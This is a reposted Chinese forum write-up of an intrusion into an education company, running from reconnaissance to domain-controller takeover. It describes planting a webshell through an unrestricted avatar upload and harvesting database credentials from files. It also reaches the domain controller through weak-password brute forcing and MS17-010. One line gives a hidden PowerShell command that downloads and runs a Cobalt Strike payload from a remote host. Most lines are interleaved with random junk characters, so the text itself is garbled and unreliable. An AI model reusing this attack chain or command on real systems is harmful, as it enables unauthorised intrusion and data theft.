|
% W; t6 }) O" z: j3 U+ E' n 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路9 G1 y2 E! X3 Y% N: r4 y
& X( F8 i7 D3 E8 D
* o6 u+ `) l4 G% R: B! a * \0 h: r8 p' D# B+ l h5 k8 z% L
! y0 V7 j+ o& ^1 I
- q. @5 u$ D2 V7 B
正文% c: i# O: r# F
! w: m h0 `7 ~8 a
1 R* q$ D' i& m2 p7 K+ Z+ h$ h - R% Y7 }0 o" H) |+ i; M
# G& t7 ~6 _2 R0 u) F5 \. @# r* Q4 E6 r4 ]
目标:www.xxxx.com(一家教育机构)
+ B9 ^% Z0 K+ }0 y) \6 Q6 p) U, K
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, ?8 E' j6 J8 T
; T7 Q/ X. a9 J* ]3 ^) z7 N5 x1 @8 X3 v4 V
 4 J# V; o/ R ?
+ B9 E# r$ E- B4 g8 d+ _
# \1 |& B# x6 c* {
进行了简单的信息搜集
' ?8 y$ @2 o. r0 v3 m# ?" _
- y3 @+ S: n3 f! p
4 R5 |, y( ~. R) z9 p' @ 2 n, v+ V( U9 R) W5 w1 H. {
/ y9 d; r% B8 s
子域名搜集
' s5 i9 N W7 | * P. T5 ~0 Y. f6 w
/ F- }8 k# k5 l% ], I9 i$ Q+ r 
6 _0 v; ?" ~4 p$ c/ K7 y6 g8 p$ E) _1 I
; I0 `6 E. ~' h# ~' n/ l# T) U& ?7 P1 u$ D T3 s9 a8 T% U: \, {
fofa找资产
4 B7 r* G) h3 A2 f) U% ^
$ O# B6 _2 v8 t$ A, Y
* ?+ L' h# X0 o% I9 W
7 ?( |4 k# E$ r2 J1 g- V Q9 m
% v) `9 T$ Z: @2 \ 
2 n1 \, K, L( _/ E% }
2 ?/ J) N" Y- h7 d& u7 ^9 N0 O3 c
' K! K; \0 k" l$ \5 _! ` 一共七个资产。去重之后只有两个。
' j2 j' f& o, [6 F
5 p4 e5 Y; H, ?" k: e$ q
! b$ S' V0 z! m8 ] 0 j/ L! d2 K7 B3 t1 Z
" G& V! p# W( U8 ^+ t% w 目录探测* K/ o W% L0 s k. X; M
7 J' e; `) l" X" s
; [+ t9 T; W' q! m+ t  ; _' h, I8 V: ?; ?" c' n1 [
3 i( g, y& _" }' ^
/ s5 ^+ }$ l9 d8 P4 U0 t! K5 R 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 g2 c. p8 H* C% q3 B" ~
. n5 q' h: T1 ?7 k; H
; |. Y- x7 ?2 ?5 N" }
9 b# _; b- a% e0 q) v- ~
( O1 \0 m; ?/ [% g, ^# Q9 g0 d
我又尝试了通过修改返回包来绕过登录界面
6 N& E0 ]' i* @/ _2 R( j8 f4 d6 z- w ( \, T( n) T3 |9 H! X0 x
! d4 l8 U' v4 h1 o9 k4 g
 & @, q; h% `$ O4 c
$ Y4 @5 w: Y+ S7 F0 L0 S) v/ A' d$ I3 C/ |
还是不行,尝试注入无果
' R! w- I3 ^4 L# g' b8 R) o
8 v3 d( Y' |, k' M% r# @# V/ H2 T3 K# T2 t
3 e) `5 d! _; A9 ?! l
4 M2 e" ^4 O% p4 |- t! t9 B( p* H2 k* ^& C1 F( M
不过我目录探测出了一处Spring信息泄露
) d" `7 B$ x3 u) u; {0 k) t" _
& Y! N. r n3 F1 P' l2 W) k, l( _* Z
! A. M, Z* p& e% z* _2 m1 u( W& k 5 Y1 p1 P7 ~) \0 X
, v0 |. K$ |% F9 i" Y 
# { a5 p9 a! p# Y4 v# q1 a % ]7 c. g9 K; P1 l& J1 \2 a
/ v/ q1 G1 z1 k( D4 o7 d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 N# B1 C# H D- F$ C$ [
2 {; i" p! d4 f. O. ^" N+ l3 X
3 u( r1 E, n& v- ~: s l X( Y% A" l 
( q, ]( c( i3 D- R) F1 M; B8 s $ u7 I; i& b" ^# ^7 q: C
, c" J) ]# U4 h. b: B
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。1 {9 C. ~' u6 z1 W/ Q7 d
4 a, F3 v l, @" o# g# O. L
3 x4 W, K8 i' m0 }9 R  , t/ P/ K1 L2 t; M5 y
& R) N3 Q9 y% p5 E$ [
* b" J( R8 [; a. p- t 获取有些师傅到这一步就手机抓包电脑测了。
% z% \% Y4 D1 x- W5 V8 C1 Y# u ( g. h0 S6 V' A/ p% U0 P! v
% t9 L/ z7 O8 [% U j7 e2 S
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: E( a2 d8 I5 h ( g8 u. N/ V3 A6 ^8 t
" Z, ^5 b# t. U: G% x
其中在一个公众号发现了小程序,可以进行注册。
" A5 `2 D$ y* h6 W7 U
; q; @7 H0 x: e+ @5 Z8 G- y% S$ {9 ~1 X% e7 H; t
看到了头像上传,尝试上传获取WebShell6 N9 V! ?8 m) p% c! H& k
5 S V9 F1 o' W$ i) f& t
" z8 g" P/ Z1 {7 J
- V H- g: }7 z# M+ Y: j E1 x. b 0 }: D7 `2 s' T
: h- D$ j+ o6 e6 m! k f4 f8 X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问/ q+ s& ^" L3 n1 e/ J. G
) i1 H4 a8 \4 x% C [9 z
% H p/ `5 b6 t$ ?
/ }8 Z1 X8 W7 T6 ~5 M9 s
) G* n& x7 U) K
1 h9 ^, \7 C5 b# Z 然后上了大马
1 I. u1 k9 e: e- a 6 `+ q! v! t. D$ |/ n
, p4 Y) N3 }! J7 w) `8 g  & V# C n/ M( p2 j8 G' L
8 p3 r. E6 C/ A( F6 O% N8 a$ {
# @) [1 _! C* r3 W7 Z1 |  - W, Z4 e/ n, R! Z, }9 W1 n
9 }6 j! L2 H/ q
( F: F- \- S2 o0 a, ?6 U* Q 通过翻找文件发现数据库账号密码$ ^6 i1 R" {0 i G2 I0 ^- M: _1 n8 ~
5 ]" k! c' e4 Z$ Z/ t# ^5 L
- i1 V/ L% e0 B+ m/ ?
 ! {8 Y" ~- V. D2 R8 v
- M! y6 j/ w- n! s
4 D$ [4 ^+ X! T" Z) c' r --内网渗透7 { z0 X$ Y% e8 I J
. @, p4 \/ O( }3 X/ S2 @& c* V. z1 Y8 v" I
直接通过powershell执行 cs上线3 g* w' b% F: O) r* w' Y
! b4 [$ t2 W, S% u' B6 r0 Y
7 }' u3 O9 \1 ~: N3 c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"4 L' m& o; |7 b- Z w% |" h( U N
2 C) e* U/ V: W9 Z
/ Y# R6 } \8 D7 j, H6 j 
: K- f8 f2 u* Q0 q; [! q2 f
" a- |( d. s5 R% ]8 U* p
- X! t% _& i' e+ w- r9 J3 u 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破2 z6 o2 L; L% J& T0 c
+ D( H( w+ I/ i4 p/ _, q* `- o2 \0 Q: o" P5 X
7 m0 D, Y6 J4 L( T$ J
4 E/ A M. x. M1 b; G+ ]4 E& I* o% l- C
- I- l3 G: o5 ] f 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: q7 b% w$ I; B0 _, c! T P- J; p
5 Q$ d$ a9 N v) j6 E
/ o5 X% Z5 E8 E2 e1 B3 x, H' g
+ `4 J0 T4 W X) u: ^
7 ]5 e! b2 |; }$ R1 D
' h) V$ b- |; L& @ 
! y+ w/ F4 u0 y; }3 f2 r : l. `3 c# E- m' F- W+ Y
9 M) M+ H# i+ G: n' g$ d 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* J8 N$ W% [) W9 C% g. ]
7 q2 F% q6 D* Y; w9 T
9 k* L& |, {2 D. j* I; k4 |' T - |8 q) k( E- j3 C+ C, ]/ [- X
/ U/ k8 G5 P8 e P! q" p! H
& v* c/ E ]0 }; U' r$ g + {. d/ M. w, c( L, @& w
8 y2 f, r) e4 M
% a. H/ J# r" v0 Y8 p! \! ^2 L3 g
0 ~) } Y( M( Q0 H, Q
9 p" q' ?+ R; T5 U* H" w, ^ T' z 2 P N2 r' F3 A0 u; z# p. T }
* H1 ~! V6 [2 M3 M) N$ \& A
$ k$ k% k% v2 X+ v& p( }/ g
& Z) K5 J5 ]) c
3 r: }- w! w6 z8 V$ p 小结
8 P' N2 [" D! @+ T% k
5 ]5 D' _. ?! Z2 G: E/ p) K4 t5 |. R* s$ @4 {# Q, Q! Z
+ R5 f* ~# q' ^0 X . ]# W3 n3 L9 F5 [
. Z# g! f7 U( B1 A 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
8 J3 m/ C* U5 Q9 d" u) H , C" F7 X5 {9 h
! R ?7 m( }) D1 i& u1 S( b; w/ \ ) A2 u3 R% ~- v+ a8 _( c
7 r6 j1 p. M& {' G; J2 [
C) M% c6 I0 t) J -
- J0 a/ U( I7 K# ? d, Q# _4 R ( m3 E, ^2 l4 f; P: }
( j% [ z5 v( W -
7 c& s' p8 p% s) K ~" p$ R+ j 0 E: p( X7 H+ r( S
5 y- f: Y0 ?0 m 1 r% Q: Q3 b J
1 U5 C- r% I( L0 W7 `
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html2 N) B6 X Q2 n/ h2 |- ?
/ F+ K$ E( r( R! Y z$ o/ T/ X! ?; U: F
: Y9 M& R4 h5 Q. g" \& w
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对